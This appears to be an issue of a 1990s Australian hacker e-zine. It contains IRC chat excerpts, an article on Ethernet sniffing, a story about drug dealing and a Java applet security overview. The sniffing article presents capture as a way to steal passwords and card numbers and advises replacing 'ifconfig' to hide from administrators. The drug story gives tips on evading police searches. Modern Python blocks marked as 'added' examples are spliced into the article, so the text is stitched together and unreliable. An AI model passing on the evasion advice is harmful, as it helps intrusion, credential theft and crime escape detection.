<dude> even overseas? and international?
<DKiNG> ummmmmm maybe its without the www...yeah i think the
afp just use http://sentry.afp.gov.au/~phreak
<nemesis> hell yes, even on the moon
<DKiNG> *ROFL*
<dude> no doesn't work either
<nemesis> oh dking, that site doesnt work either ;>
[ed note: as u can see, dudes IQ spands that of a retarted KUA member. LOL.
Very few of the techniques described here would even work, &
http://sentry.afp.gov.au/~phreak. wot kinda fool would be dat lame? h0h0h0]
<The-Mind> that'll attract the feds like moths to a flame
is there any books on hacking?
the does superuser mean?
what program do you use to hack pc's
how do you get the number of the other pc
so warez is copied files?
can i have ops?
<Anaconda> if ya dont know what to do in a unix sys mind DONT TRY TO HACK IT
<frog> .me is from oz..
<frog> DOH!
<Anaconda> feds are pussy's
*** ssnake changes topic to "Absolutely >NO< illegal activity going on in
here, so piss off!"
* Reaper killed millions of aliens in ufo's by farting on an ant hill!..
<PiNZ> ne1 here know about ozemail tightening up the security?
<St> fedz are on Ozemail
i really wanna learn something
does anyone know how to phreak in australia? i have been trying but
have had no luck
what is the root account?
what does @ next to your alias mean?
so who are telstra again?
*** BlackHaze changes topic to "Morphin back at ya wiff 0-day kardin' k0d3z#!@
wh00t#@!"
<nemesis> DeM k0DEz /\Re k0MinG T|-|Ru
<The-Mind> PGPfone? Don't think zimmerman programmed that one did he?
Hello fellow hackers!
i'm not lame you are!
what is lag?
what is +tn on the top of the window mean?
<|-XYZ-|> who has something to trade 4 a T1 hacking site??
<frog> shaman: #hacking is soon to be shut down by ircops....
<ssnake> The meaning of "hacker" has been twisted by the media
<ssnake> Is it true that the US government forced the D00d who write PGP to
write a backdoor into the latest international versions?
[Ed: We at CLD can verify the existment of the pgp backdoor ;> ]
<Shard> pinz: he must have hacked root on machine to create account or are
they non unix machines... thats a major feat in itself
<{_DeV_}> yeah, hacking away the bricks....
<Sage> i am the hacker of hackers
<BlackHaze> Sage: oh, da haqrz of all haqrz... hhehe. spew forth your
knowledge
<Sage> graduated from SAS swat team 2 yrs ago
[Ed: Sage said to me that for graduating from SAS, me managed to steal 7,
thats right, seven waterpistols!!]
.____________________________________________________________________________.
-= The Basics of Sniffing
-= By MiNDWaRP
Intro
~~~~~
Well this is my first article for CLD, so I will try to make it as good
as possible. For those ppl who don't know me my name's MiNDWaRP and you
can occasionally find me on #security on IRC. Other than that you can mail
me through KaosNet or DaemonNet. This issue's article is to do with sniffing.
How to gain heaps of information not meant for you by spying on ethernet
packets. Uses could include spying on email thru to gaining credit card
numbers/account numbers. However you must have root axs on a networked
computer before you can do this. This article will not detail how to get root,
but it will tell you the basics of what sniffing is, programs you need to do
it, some common sense advice when it comes to sniffing, and some source code
you can compile...
Greetz
~~~~~~
Greetz go to Grim, TPV, Void, AciDX, and everyone else in the scene.
Fuq offs
~~~~~~~~~
Fuq offs go to the eternally pathetic Pierre Thorand, and all the try-hard
lamer anarchists who do nothing but talk.. if you're so good why don't you
prove it...
The basics of sniffing
~~~~~~~~~~~~~~~~~~~~~~
Computer networks today, unlike telephone sytems, rely upon computers sharing
information rather than individual connections to a central mainframe. This
means that a computer connected to a network is capable of recieving
information that was meant for another computer. Capturing the information as
is passes through the network is known as sniffing.
Nowadays the most "popular" way of connecting PCs is through the ethernet. For
those who don't understand how the ethernet works I will briefly describe it
for you. The ethernet protocol works by sending small "packets" of info to all
machines/PCs on the same network. Contained within the packet is what is known
as a packet header. This header contains the address of the destination
machine. Supposedly (yeah right.. ;) only the machine with the matching address
is meant to receive the packet. A machine that accepts all packets, whatever
the destination address in the header, is said to be in promiscuous mode..
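The header check described above, as an added example (not part of the original
article): it parses the 14-byte Ethernet II header and models the receive filter
a network card applies in normal mode versus promiscuous mode. The host addresses
and the frame are constructed sample data, and the function names are made up for
this illustration.

```python
import struct

BROADCAST = bytes.fromhex("ffffffffffff")

def mac(text):
    """Turn 'aa:bb:cc:dd:ee:ff' into 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))

def parse_header(frame):
    """Split the Ethernet II header into destination, source and EtherType."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return dst, src, ethertype

def nic_accepts(frame, own_mac, promiscuous=False, multicast_groups=()):
    """Model the receive filter of a network card on a shared segment."""
    dst, _, _ = parse_header(frame)
    if promiscuous:
        return True                 # filter disabled: every frame is passed up
    if dst == own_mac or dst == BROADCAST:
        return True
    # The lowest bit of the first octet marks a multicast destination.
    if dst[0] & 1 and dst in multicast_groups:
        return True
    return False

# Constructed sample: host A sends a frame to host B, host C is a bystander.
HOST_A = mac("02:00:00:00:00:0a")
HOST_B = mac("02:00:00:00:00:0b")
HOST_C = mac("02:00:00:00:00:0c")
FRAME_A_TO_B = HOST_B + HOST_A + struct.pack("!H", 0x0800) + b"constructed payload"

def who_receives(frame, promiscuous_hosts=()):
    """Names of the hosts (B, C) whose card hands the frame to the OS."""
    hosts = {"B": HOST_B, "C": HOST_C}
    return sorted(name for name, addr in hosts.items()
                  if nic_accepts(frame, addr, name in promiscuous_hosts))

if __name__ == "__main__":
    print("normal mode:        ", who_receives(FRAME_A_TO_B))
    print("C in promiscuous:   ", who_receives(FRAME_A_TO_B, promiscuous_hosts=("C",)))
```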
In a normal networking environment, account and password information is
passed along in clear-text, making it relatively easy for someone, once they
have gained root axs on a machine, to put it into promiscuous mode, and by
sniffing, "compromise" all the machines in the network.
How do I do it..?
~~~~~~~~~~~~~~~~~
Well, the primary way us hackers compromise these ethernet packets is by
sniffing them with groovy little progs. One such program is called esniff.c,
which is for use on Unix systems. However there is a variety of sniffers
available, both freeware and commercial, for most O/S.
Network Sniffers
~~~~~~~~~~~~~~~~
* Snoop on Solaris 2.x, also works on SunOS 4.1 - ftp.playground.sun.com
* Packetman - ftp.cs.curtin.edu.au:/pub/netman/[sun4c|dec-mips|sgi|alpha|solaris2]/packetman-1.1.tar.Z
  <-(haven't checked this out)
* Esniff.c - ftp.coombs.anu.edu.au:/pub/net/log
DOS based sniffers
~~~~~~~~~~~~~~~~~~
* Ethdump v1.03 - ftp.germany.eu.net:/pub/networking/inet/ethernet/ethdp103.zip
* Ethload v1.04 - companion util for use with an ethernet monitor
  - ftp.germany.eu.net:/pub/networking/monitoring/ethload/ethld104.zip
These are not the only sniffers available. There are commercial ones too,
but who is going to PAY for one of these...? There are also many
sniffers coming out recently which are available at most good hacking
web sites.
Advice when using a sniffer
~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. A method used by sysadmins to detect a sniffer that only collects data,
and does not actually respond to any of the information, is to "physically"
check all ethernet connections in a network. So if you are running a sniffer
from a computer you have regular axs to, i.e. at work or school, but you have
physically connected it to a network that it's not meant to be connected to
it makes sense to disconnect it after you are finished. In other words
minimise the time it is connected to minimise the risk of getting caught.
2. There is a command on some Unix systems which allows a sysadmin to check
the status of all interfaces and whether or not they are in promiscuous mode:
> ifconfig -a
You should run this to see whether the sniffer you are using
is detectable. By replacing the command "ifconfig" you will greatly reduce
the chances of detection.
3. When you run a sniffer make sure you regularly check the log it creates,
copy it if necessary, and delete it afterwards. This is due to the fact that
if you run a sniffer on a heavily-utilised network the log becomes so large
that all the file space is used up. Now obviously it would take a while to
happen, but if you carelessly leave one running it is possible.
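The sysadmin-side check from point 2, as an added example (not part of the
original article): it reads each interface's flag word straight from the kernel
instead of trusting the output of the "ifconfig" binary, which point 2 notes can
be replaced. It assumes a Linux host exposing /sys/class/net/<iface>/flags; the
function names are made up for this illustration.

```python
import os

IFF_PROMISC = 0x100   # promiscuous bit in the Linux interface flags word

def is_promiscuous(flags_text):
    """flags_text is the content of /sys/class/net/<iface>/flags, e.g. '0x1103'."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)

def promiscuous_interfaces(sysfs_root="/sys/class/net"):
    """Return the names of interfaces whose kernel flags have IFF_PROMISC set."""
    found = []
    if not os.path.isdir(sysfs_root):
        return found
    for name in sorted(os.listdir(sysfs_root)):
        path = os.path.join(sysfs_root, name, "flags")
        try:
            with open(path) as handle:
                if is_promiscuous(handle.read()):
                    found.append(name)
        except (OSError, ValueError):
            continue   # entry is not an interface, vanished, or is malformed
    return found

if __name__ == "__main__":
    hits = promiscuous_interfaces()
    if hits:
        print("promiscuous interfaces:", ", ".join(hits))
    else:
        print("no interface reports promiscuous mode")
```

Run it from cron or a monitoring agent and alert on any interface that is not expected to capture traffic.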
.____________________________________________________________________________.
DIsClAiMeR: The following story is fictitious and bears no resemblance to
things that may or may not have happened to persons living, dead or undead :>
Getting Trashed By The Cops
~~~~~~~~~~~~~~~~~~~~~~~~~~~
I lived in a house with two other guys, a drummer and loser, we'll call them
Chuck and Steve. We lived on a busy main road, an had lots of friends
droppin by, to say hello an score. I probably moved an ounce or so a week in
$50 bags to people we knew from school and other acquaintances, which was
fine by me, a few $$$ on the side an free smoko whenever I wanted it. Not so
for Steve, he couldn't keep his side of things together, he'd constantly
smoke more than he sold an eventually put himself out of business, ie no one
would give him credit, so he couldn't deal. SO I inherit Steve's 'dealership'
which was pretty big, full of people I didn't really know that well, but they
had the cash an knew not to ask for credit. I started to move a LOT more dope,
Steve was unemployed an at home all day and was able to handle the
distribution during the day, he was under strict orders of no credit to
anyone and would 'skim' off the top of the bags to keep himself in dope.
Things were going along quite nicely, I had a nice little earner on the side,
Steve was getting as bent as he wanted. Then things started to get a little
odd, our garbage bin would move from where I left it, the side gate was
sometimes open or ajar, I figured it was one of the guys being lazy or
somethin, I shrugged it off as my legit business was booming and I didn't
have the time or the motivation to look into it.
Things got worse, people I didn't know started knockin on the door an askin
to score. If Steve wasn't there to vouch for them I'd tell them to FUCK
OFF, things were gettin a bit outta hand. Upon quizzing Steve most of the
people he could ID but some he didn't know, he passed them off as friends of
friends. This was not good, I was aware that what we were doing could get us
into a lot of trouble, Steve however didn't really give a fuck or understand
what his actions could lead to. The dealing continued with me telling Steve
to scale things down to a manageable level. I might add that Chuck was cool an
kept his part of the dealings in control. Steve didn't scale things down, the
phone was ringin off the hook an people were comin an goin like crazy on
weeknights (usually a quiet time). It was round then I quizzed the guys about
the garbage bin an the side gate. They said they never used the gate and I
was the one who had the garbage duties.....
It took a while for the penny to drop, so life went on, people who called in
after 11pm on weeknights were greeted at the door by me an a pump action
shotgun, that problem soon stopped. Things were back to 'normal', a lotta
comings an goings mostly Thur, Fri, Sat which was cool an the bin seemed to
stop moving and the gate remained closed.
It was a Tuesday night/Wednesday morning about 2.30am, the doorbell rang an
rang an rang till I woke up, grabbed my rifle an answered the door (I was not
in a good mood). There was a woman dressed in a local pub staff shirt asking
if she could score? saying she'd heard she could score from here, I'd never
seen her before and out on the street a late model Commodore was waiting
for her, I told her to FUCK OFF! She took the advice and left.
The penny finally dropped, the barmaid was an undercover COP, and the moving
bin thing was the COPS TRASHIN US FOR EVIDENCE. FUCK!
Next morning we had a meeting, I declared the shop was SHUT. I didn't need
the shit that happened last nite and stopped giving Steve product to sell an
told him to spread the word to his 'friends'. New precautions were placed on
the garbage, every night I'd pour sour milk or mouldy potato juice or
anything else disgusting I could find over our garbage.
About a week later I found 1/2 the contents of our garbage bin laying in
our backyard. The bin was previously left out the front, I sorta felt sorry
for the cop who went thru it, as it was a particularly disgusting pile of
rubbish, my guess was they got halfway thru and got sick, suckers.
Oh well time to move, that day I terminated the lease and within a fortnight
was in a different house with different people.
Some lessons learned, never throw out incriminating evidence with your
household waste (yeah even 'roasted' cigarette butts), it seems the cops have
been trashin long b4 hackers existed. Sell only to who u know, if I sold to
the 'barmaid' who knows what would've happened. It won't be your own stupidity
that gets u busted, it'll be someone else who fucks things up for you. Steve
was STUPID, he has since gone down for several possession and trafficking
charges, once the cops know who u are they keep a close eye on you. If in
doubt move out, it's cheaper than a court case.
-JET BLACK
Catch me on #security on Oznet
.___________________________________________________________________________
-= Java Security - Does Sun's new language promise security on the Internet
-= By CLD Staff
-= Revision 1.2
Java. Yes, no doubt one of the biggest media hype-ups concerning computer
languages of all time. Many people believe that Java is just for pretty
multimedia on web pages. In fact this is definitely not the case; more than
half the digital community do not see the full potential of this exciting new
language. To put it simply, Java is not another form of multimedia
scripting/authoring but rather programming for the Internet. It extends far
beyond buttons, sounds and animations on the web. Take the case that you had
an Oracle database on a mainframe which did not support http capabilities: you
could write a Java applet to directly communicate with the server & pump out
the data from the mainframe directly on the web with little hassle. Let's hope
that people grasp this exciting new language as it looks as though Java will
radically change the Internet as we know it today.
With Java extending such large capabilities, security issues become a concern.
As a general rule of thumb, any data accessed over a network other than
local is presumed 'untrusted' & the Java environment takes precautions
so that an applet cannot do malicious actions (such as corrupting your
system, opening network connections to untrusted sources, deleting files etc).
Sun has realised this and in turn has focused much attention on addressing
security related problems in the Java environment. But as always bugs are
prominent in the security model & measures have to be taken to assure that
malicious code won't be able to run.
Java Security Restrictions
The Java Security model has some heavy restrictions on what a Java
applet can and cannot do. Intermediate security options are available to
allow an applet to run in an un-restricted environment, and as Java gains
its foothold on the Internet, Web clients will allow user control over
these restrictions, for applets to open network connections to other
hosts and more flexibility over the i/o disk functions on the local
system etc.
Generally speaking, an applet loaded over a network other than local
currently cannot:
- Read/Write files on the local system
- Open a network connection to other hosts, other than where the applet
  originated from
- Check for the existence of a file on the local system
- Listen for incoming network connections on any port on the local
  system
- Call System.exit() or Runtime.exit() to force the Java client to exit
- Create a SecurityManager/ClassLoader object
- Obtain user information, or obtain information about the following
  system properties:
    user.home
    java.home
    user.name
    user.dir
    java.class.path
- Access or load any other class, other than those in the standard eight
  packages:
    java.awt
    java.lang
    java.net
    java.io
    java.applet
    java.awt.peer
    java.util
    java.awt.image
- Manipulate any ThreadGroup other than its own
- Call File.delete() to delete files on the local system or invoke rm or del
- Call File.renameTo() to rename files on the local system or invoke mv or
  rename
- Call File.mkdir() to create directories
The Java application which runs the applet decides whether many of the above
restrictions apply or not. If an applet is loaded
from the local network many if not all of the above restrictions
are lifted & the applet can usually run in a more or less un-restricted
environment.
The java.lang.SecurityManager controls which security operations are
allowed under the current environment. Applet clients create a sub-class
of the SecurityManager to implement the security policy they will
use. A security policy is put in place by calling System.setSecurityManager().
An obvious security hole would be in place if untrusted code loaded over
the network could implement its own SecurityManager object: the applet
could run itself in its own environment without any restrictions. Of
course Sun has realised this huge problem & measures are in place for
untrusted code not to load its own SecurityManager object.
Added security comes from the java.lang.ClassLoader: this class prevents
an applet from replacing the classes of the standard eight Java packages with
its very own.
Not only does the Java environment include tough measures in how classes
are loaded over the network & what security measures are in place for the
applet to run in an environment defined by the SecurityManager, it also
provides Byte-Code Verification, where code is checked to ensure that it
cannot forge pointers to memory or cause strange things to happen in the
running of the applet.
Overall, Java's security is well structured but some important bugs
need to be addressed before Sun can claim that Java's security is
un-breakable.
.____________________________________________________________________________.
-= neXt iSSUE
Well, we hope that this issue is up to standards as we have totally
re-organized the way CLD works & the writers/editors involved.. Until next
issue try desperately to unite the scene & finally lift it off the ground as
we feel that time has finally come..
neXt iSSUE...
TCP/IP & its structure
The CLD crew will investigate bugs behind linux & write some ka0s k00l code.
More Aussie Phreaking Techniques
More News, Java fakemail applets...
& Much more.
.____________________________________________________________________________.
CYBERLABS DiGiTAL iSSUE 4
bhaze@fl.net.au
diceman@fl.net.au
sydney.oz.org - #security
EOF